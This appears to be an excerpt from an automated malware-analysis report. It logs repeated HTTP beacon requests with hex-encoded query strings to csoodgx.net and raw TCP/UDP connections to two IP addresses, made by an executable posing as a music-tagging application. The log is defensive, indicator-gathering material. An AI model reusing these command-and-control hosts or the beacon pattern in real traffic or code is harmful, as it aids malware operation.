        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownUDP traffic detected without corresponding DNS query: 141.98.234.31
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AD72A7 Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free,4_2_02AD72A7
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
